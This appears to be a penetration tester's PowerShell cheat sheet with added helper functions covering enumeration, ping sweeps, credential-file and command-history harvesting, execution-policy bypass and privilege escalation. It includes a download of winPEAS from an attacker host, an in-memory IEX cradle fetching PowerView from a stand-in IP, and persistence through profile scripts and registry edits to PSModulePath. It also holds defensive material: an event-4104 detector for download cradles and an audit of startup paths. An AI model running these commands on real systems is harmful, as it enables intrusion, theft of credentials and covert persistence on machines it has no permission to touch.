PowerShell cmdlets follow a Verb-Noun naming scheme (Get-Process, New-LocalUser).
To search for a cmdlet by name (wildcards allowed), type
Get-Command New-U*
To see all properties and methods of the objects a cmdlet returns, type
Get-LocalUser | Get-Member
To see specific or non-default properties, type
Get-LocalUser | Select-Object -Property Name,PasswordRequired
- Use Get-Help $cmdlet (with $cmdlet replaced by the cmdlet's name) to get the help page for it; Get-Help $cmdlet -Examples shows usage examples.
- Add -WhatIf to any state-changing command that supports it to see what it would do without doing it.
- To see all properties of the output objects, pipe a command through Format-List *
- ps | Format-List *
- dir | fl *
- The ForEach-Object cmdlet (alias %) is very useful:
- ps | % { Write-Host "PID = " $_.ID }
- The Where-Object cmdlet (alias ?):
- get-service | ? { $_.Status -eq "Running" }
- Directory listing:
- Get-ChildItem -Recurse $dir
- ls -r $dir
- Select only some columns:
- ps | select id
- Find a file on the filesystem whose name contains a substring. The second positional argument of Get-ChildItem is -Filter, so the wildcards are needed; without them only a file named exactly "assword" would match:
- ls -r $dir *assword* | % { echo $_.FullName }
- ls -r $dir *assword* 2>$null | % { echo $_.FullName }   # 2>$null discards the error stream (e.g. access-denied messages)
- Show all PowerShell variables, or all environment variables (these are two different drives):
- ls variable:
- ls env:
- echo $varname
- echo $env:USERNAME
- Grep through files (this only matches files directly below the user directories; combine with Get-ChildItem -Recurse to search deeper):
- Select-String -Path C:\Users\*.* -Pattern assword 2>$null
- Ping sweep over a /24 (host addresses 1-254):
- 1..254 | % { echo "10.10.10.$_"; ping -n 1 -w 100 10.10.10.$_ | Select-String ttl }
- Pagination:
- ls -r | Out-Host -Paging
- Output is too large?
(...) | Out-File -FilePath C:\Temp\a.txt
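A more robust version of the ping sweep above, added here as an example and not part of the original page: it uses the .NET Ping class with an explicit timeout instead of scraping ping.exe output, and returns objects that can be piped into Where-Object, Sort-Object or Export-Csv. The 10.10.10.0/24 range is the one used above; the function and parameter names are my own.

```powershell
# Added example: ICMP sweep with System.Net.NetworkInformation.Ping.
# Emits one object per host instead of raw ping.exe text.
function Invoke-PingSweep {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Prefix,   # first three octets, e.g. '10.10.10'
        [int]$Start = 1,
        [int]$End = 254,
        [int]$TimeoutMs = 200,
        [switch]$All                              # also emit hosts that did not answer
    )
    $pinger = New-Object System.Net.NetworkInformation.Ping
    foreach ($i in $Start..$End) {
        $ip = "$Prefix.$i"
        try {
            $reply  = $pinger.Send($ip, $TimeoutMs)
            $status = $reply.Status.ToString()      # 'Success', 'TimedOut', 'DestinationHostUnreachable', ...
            $rtt    = $reply.RoundtripTime
            $ttl    = if ($reply.Options) { $reply.Options.Ttl } else { $null }
        } catch {
            # Send() throws (instead of returning a status) for e.g. unresolvable or malformed addresses
            $status = "Error: $($_.Exception.Message)"
            $rtt = $null
            $ttl = $null
        }
        if ($status -eq 'Success' -or $All) {
            [pscustomobject]@{
                Address = $ip
                Status  = $status
                RttMs   = $rtt
                Ttl     = $ttl   # rough OS hint: ~64 Linux/Unix, ~128 Windows, ~255 network gear
            }
        }
    }
    $pinger.Dispose()
}

# Usage: only hosts that answered, sorted numerically by address
Invoke-PingSweep -Prefix '10.10.10' | Sort-Object { [version]$_.Address } | Format-Table -AutoSize
```

Hosts that drop ICMP will not show up; the TTL column is only a hint and is easily changed on the target.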
Examples
Directories and files
Get all files in the current directory.
Get-ChildItem
Get all files in the current directory and below.
Get-ChildItem -Recurse
Get all files in the current directory and below, including hidden and system files. Note that -Hidden or -System on their own return only hidden or only system items; -Force returns everything.
Get-ChildItem -Recurse -Force
Search for files with a name:
Get-ChildItem -Recurse -ErrorAction SilentlyContinue -Filter "flag.txt"
Get-ChildItem -Recurse -ErrorAction SilentlyContinue -Force | Where-Object -Property Name -like '*abc*' | Select-Object Name, Mode
Select only the Name and Mode column.
Get-ChildItem -Recurse -ErrorAction SilentlyContinue -Force | Select-Object Name, Mode
Find files whose content contains abc. Select-String has no -Recurse parameter, so let Get-ChildItem do the recursion and pipe the files in:
Get-ChildItem -Path C:\path\to\directory -Recurse -File -ErrorAction SilentlyContinue | Select-String -Pattern "abc"
Search for interesting suffixes (the -Include patterns need the wildcard; ".txt" alone would only match a file literally named ".txt"):
Get-ChildItem -Path C:\Users\nadine\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
Sort alphabetically by name:
Get-ChildItem -Recurse -ErrorAction SilentlyContinue -Force | Where-Object -Property Name -like '*abc*' | Select-Object Name, Mode | Sort-Object Name
Count how many files are found (wrap the whole pipeline in parentheses):
(...).Count
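The one-liners above combined into a single reusable search, added here as an example (not from the original page): it walks the given roots, keeps only files with interesting extensions, optionally greps them for a credential-looking regex, skips oversized files, and reports how many paths could not be read instead of silently dropping them. The function name, the extension list and the regex are illustrative assumptions.

```powershell
# Added example: hunt for potentially interesting files by extension and content.
# The default extension list and regex are illustrative, not from the page.
function Find-InterestingFiles {
    [CmdletBinding()]
    param(
        [string[]]$Path = @("$env:USERPROFILE"),
        [string[]]$Extension = @('*.txt','*.ps1','*.config','*.xml','*.ini','*.kdbx','*.rdp','*.docx','*.xlsx'),
        # Content regex; pass '' to list matching files without inspecting their content
        [string]$Pattern = '(?i)passw(or)?d|secret|api[_-]?key|BEGIN (RSA|OPENSSH) PRIVATE KEY',
        [long]$MaxSizeBytes = 5MB,
        [string]$ExcludeDirRegex = '\\(node_modules|\.git|WinSxS)\\'
    )
    # -Force includes hidden/system files; access errors are collected in $denied instead of aborting
    $files = Get-ChildItem -Path $Path -Recurse -Force -File -Include $Extension `
                 -ErrorAction SilentlyContinue -ErrorVariable denied |
             Where-Object { $_.FullName -notmatch $ExcludeDirRegex }

    foreach ($f in $files) {
        $hit = $null
        if ($Pattern -and $f.Length -le $MaxSizeBytes) {
            # -List stops at the first matching line per file
            $hit = Select-String -LiteralPath $f.FullName -Pattern $Pattern -List -ErrorAction SilentlyContinue
        }
        if (-not $Pattern -or $hit) {
            $snippet = $null
            if ($hit) {
                $text = $hit.Line.Trim()
                $snippet = $text.Substring(0, [math]::Min(120, $text.Length))
            }
            [pscustomobject]@{
                FullName      = $f.FullName
                SizeKB        = [math]::Round($f.Length / 1KB, 1)
                LastWriteTime = $f.LastWriteTime
                Line          = if ($hit) { $hit.LineNumber } else { $null }
                Match         = $snippet
            }
        }
    }
    if ($denied.Count) {
        Write-Warning "$($denied.Count) path(s) could not be read (access denied or path too long)"
    }
}

# Usage: content hits under C:\Users, and a plain count of candidate files without grepping
Find-InterestingFiles -Path C:\Users -Pattern 'assword' | Format-Table -AutoSize -Wrap
(Find-InterestingFiles -Pattern '').Count
```

Office files and KeePass databases are compressed or encrypted, so the content grep will not see inside them; they are still listed when -Pattern is empty.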
Network requests
Perform a GET request:
Invoke-WebRequest $url
(On Windows PowerShell 5.1 add -UseBasicParsing if the request fails with the Internet Explorer first-run/engine error.)
Download a file:
iwr -Uri http://$attacker/winPEASx64.exe -OutFile winPEAS.exe
Privilege escalation
Run a command as another user (prompts for that user's password):
runas /user:albert cmd
Various
Encode a file to base64
[Convert]::ToBase64String([IO.File]::ReadAllBytes('Desktop\b64.txt'))
Get the PowerShell history of the current session only
Get-History
Get the path of the persistent PSReadLine history file, which survives across sessions (usually %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt of the user)
(Get-PSReadlineOption).HistorySavePath
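Building on the history path above, here is an added example (not part of the original page) that collects the persistent PSReadLine history of every user profile on the box and searches it for credential-looking commands. Reading other users' files requires administrative rights; otherwise only the current user's history is found. The regex and the function name are my own assumptions.

```powershell
# Added example: search all users' persistent PSReadLine history files.
# The wildcard *history.txt also catches other hosts' files (e.g. the VS Code host).
function Get-PSHistoryHits {
    [CmdletBinding()]
    param(
        # Illustrative pattern for secrets and tooling typed at the prompt
        [string]$Pattern = '(?i)passw(or)?d|-Credential|ConvertTo-SecureString|net user|runas|Invoke-WebRequest|\bIEX\b',
        [string]$UsersRoot = "$env:SystemDrive\Users"
    )
    $paths = @()
    # Current session's file first; its location can be changed with Set-PSReadLineOption,
    # and Get-PSReadLineOption throws when the module is not loaded (non-interactive hosts)
    try { $paths += (Get-PSReadLineOption).HistorySavePath } catch { }
    $paths += Get-ChildItem -Path "$UsersRoot\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\*history.txt" `
                  -Force -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName

    foreach ($p in ($paths | Where-Object { $_ } | Sort-Object -Unique)) {
        # Attribute the file to an account from its location under the profile root
        $user = if ($p -match '\\Users\\([^\\]+)\\') { $Matches[1] } else { '?' }
        Select-String -LiteralPath $p -Pattern $Pattern -ErrorAction SilentlyContinue |
            ForEach-Object {
                [pscustomobject]@{
                    User       = $user
                    File       = $p
                    LineNumber = $_.LineNumber
                    Command    = $_.Line.Trim()
                }
            }
    }
}

Get-PSHistoryHits | Format-Table -AutoSize -Wrap
```

Commands run with Set-PSReadLineOption -HistorySaveStyle SaveNothing, or with PSReadLine unloaded, never reach the file, so an empty result does not prove nothing was typed.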
Command manipulation / filtering
Get only lines from the output which contain abc (non-string objects are compared by their string representation):
Your-Command | Where-Object { $_ -match 'abc' }
Get only lines from the output which do not contain abc:
Your-Command | Where-Object { $_ -notmatch 'abc' }
Execute
From a file (import the script into a session, then call its functions; -NoExit keeps the child process open, otherwise it exits right after the import and the functions are gone):
powershell -exec bypass -NoExit -Command "Import-Module .\file.ps1"
(After this, call the function to execute it. Inside an existing session, dot-sourcing the file with . .\file.ps1 does the same.)
Directly:
powershell -exec bypass -File file.ps1
Other method (reads the script from stdin, e.g. from cmd.exe):
powershell -exec bypass -command - < c:\mypath\myscript.ps1
Other method (the sysnative path reaches the 64-bit powershell.exe from a 32-bit process such as a 32-bit meterpreter):
%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -command "& { . C:\Users\kostas\Desktop\39719.ps1; Invoke-MS16-032 }"
In meterpreter:
meterpreter > execute -f "powershell -command \" get-netfirewallrule -all \"" -i
Changing the ExecutionPolicy
The execution policy is not a security boundary (see the -exec bypass examples above); it only prevents accidental script execution. It can be set machine-wide or for the current user. Listing the policy for the current user:
Get-ExecutionPolicy -Scope CurrentUser
Setting it to unrestricted for the current user (no admin rights needed; the LocalMachine scope requires an elevated shell and both can be overridden by Group Policy):
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
Enumeration
Show users
Get-LocalUser
Show network addresses
Get-NetIPAddress
Show processes
Get-Process
Show all information (version, company, attributes, etc.) about a file, e.g. an executable:
Get-ItemProperty -Path "C:\..\miiserver.exe" | Format-List -Property * -Force
Find only files
Get-ChildItem -Recurse -File
Registry access
The registry is exposed as drives (HKLM:, HKCU:) and can be browsed like a file system.
PS> cd HKLM:
PS> Get-ChildItem
Loading PS scripts into memory
With this method no file has to be written to disk on the target.
- Serve the PowerShell script over HTTP.
- In PowerShell, download the script text and evaluate it with Invoke-Expression (IEX):
PS> IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.119.158:8081/PowerView.ps1')
- The module's functions can now be used in this session.
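The defender's view of the cradle above, added here as an example that is not part of the original page: with script block logging enabled, every executed script block, including text pulled in by IEX, is written to event ID 4104 in the Microsoft-Windows-PowerShell/Operational log. The function below pulls recent 4104 events and flags download-cradle patterns. The pattern list and the function name are illustrative assumptions; the event property layout (script text in Properties[2], path in Properties[4]) is the standard 4104 layout.

```powershell
# Added example (detection side): find download cradles in PowerShell script block logs.
# Requires "Turn on PowerShell Script Block Logging" and read access to the Operational log.
function Find-DownloadCradles {
    [CmdletBinding()]
    param(
        [int]$Hours = 24,
        [int]$Max = 5000,
        # Illustrative cradle indicators; tune for your environment
        [string]$Pattern = '(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-Expression|\bIEX\b)'
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    # SilentlyContinue hides the "No events were found" error when the window is empty
    Get-WinEvent -FilterHashtable $filter -MaxEvents $Max -ErrorAction SilentlyContinue |
        ForEach-Object {
            # 4104 properties: [0] MessageNumber, [1] MessageTotal, [2] ScriptBlockText, [3] ScriptBlockId, [4] Path
            $text = [string]$_.Properties[2].Value
            if ($text -match $Pattern) {
                $flat = $text -replace '\s+', ' '
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    User    = $_.UserId                  # SID of the account that ran the block
                    Path    = $_.Properties[4].Value     # empty for interactive/IEX-evaluated blocks
                    Part    = "$($_.Properties[0].Value)/$($_.Properties[1].Value)"
                    Snippet = $flat.Substring(0, [math]::Min(160, $flat.Length))
                }
            }
        }
}

Find-DownloadCradles -Hours 72 | Sort-Object Time -Descending | Format-Table -AutoSize -Wrap
```

Large scripts are split over several 4104 events (the Part column); the cradle itself is usually a short block of its own, while the downloaded module shows up as a separate multi-part block with an empty Path, which is itself a useful signal.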
Obfuscate
Use Chimera (a PowerShell obfuscation tool).
On Linux
Install PowerShell from https://github.com/PowerShell/PowerShell/releases/ and use the pwsh command.
Exploiting PowerShell
When a command name is typed, PowerShell resolves it in the following order. Redefining something high up in the hierarchy (e.g. a function with the name of a cmdlet or executable) makes other users, scripts and scheduled tasks that rely on that name run your code as well.
- Doskey alias (cmd.exe only; doskey macros do not apply inside PowerShell)
- Alias
- Function
- Cmdlet
- Executable (native command found via PATH; a bare name never resolves to a script in the current directory)
To gain information from existing scripts on the system, look into the following paths:
- C:\scripts
- $HOME\Documents\WindowsPowerShell
- $PSHOME
- C:\Windows\System32\WindowsPowerShell\...\
The following profile scripts are executed automatically when a user starts PowerShell (in this order: all users/all hosts, all users/this host, this user/all hosts, this user/this host). Check whether they exist and whether you can create or modify one of them; the $PROFILE variable holds the four paths for the current host. PowerShell 7 uses Documents\PowerShell instead of Documents\WindowsPowerShell.
- $PSHOME\Profile.ps1
- $PSHOME\Microsoft.PowerShell_profile.ps1
- $HOME\Documents\WindowsPowerShell\Profile.ps1
- $HOME\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
To achieve persistence you can add a path you control to the PSModulePath environment variable; this could also be a network share you have access to. Modules in these directories are found by Import-Module and auto-loaded on first use of one of their exported commands, so the directory must be named after the module (e.g. <path>\Foo\Foo.psm1). Writing the machine-wide value below needs administrative rights; a user-scoped PSModulePath variable is also honored and needs none. The following is taken from SEC660 2.2.
$origpaths = (Get-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Session Manager\Environment" -Name PSModulePath).PSModulePath
$newPath = $origpaths + ";C:\Users\...\OneDrive\PowerShell\"
Set-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment" -Name PSModulePath -Value $newPath
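The check a practitioner wants for both the profile locations and the PSModulePath entries above, added here as an example that is not part of the original page: it lists the four profile paths of the current host (read from $PROFILE) and every PSModulePath entry in search order, and reports whether each exists and whether the current user can write there. Writability is tested by actually creating and deleting a random file in the first existing ancestor directory rather than by interpreting ACLs; the function names are my own.

```powershell
# Added example: audit PowerShell's startup surface (profiles and module search path).
function Test-PathWritable {
    param([Parameter(Mandatory)][string]$Path)
    # Probe with a real write (create + delete a random file) instead of parsing ACLs.
    # If the target does not exist, walk up to the first existing ancestor: that is
    # where the missing file or directory would have to be created.
    $dir = if (Test-Path -LiteralPath $Path -PathType Container) { $Path } else { Split-Path -Parent $Path }
    while ($dir -and -not (Test-Path -LiteralPath $dir)) { $dir = Split-Path -Parent $dir }
    if (-not $dir) { return $false }
    $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        $true
    } catch {
        $false
    }
}

function Get-PSStartupSurface {
    # $PROFILE is a string with the four profile paths attached as note properties
    foreach ($scope in 'AllUsersAllHosts', 'AllUsersCurrentHost', 'CurrentUserAllHosts', 'CurrentUserCurrentHost') {
        $p = $PROFILE.$scope
        [pscustomobject]@{
            Kind     = "Profile/$scope"
            Path     = $p
            Exists   = Test-Path -LiteralPath $p
            Writable = Test-PathWritable -Path $p
        }
    }
    # PSModulePath entries, in the order PowerShell searches them
    foreach ($p in ($env:PSModulePath -split ';' | Where-Object { $_ })) {
        [pscustomobject]@{
            Kind     = 'PSModulePath'
            Path     = $p
            Exists   = Test-Path -LiteralPath $p
            Writable = Test-PathWritable -Path $p
        }
    }
}

Get-PSStartupSurface | Format-Table -AutoSize
```

A Writable row for an AllUsers profile or for a PSModulePath entry outside the user's own profile directory is the finding (as attacker: a drop location; as defender: a misconfiguration to fix). The CurrentUser paths are expected to be writable by their owner, which is exactly why profile scripts are a common per-user persistence spot. The write probe leaves a short-lived file behind, so run it with that in mind on monitored hosts.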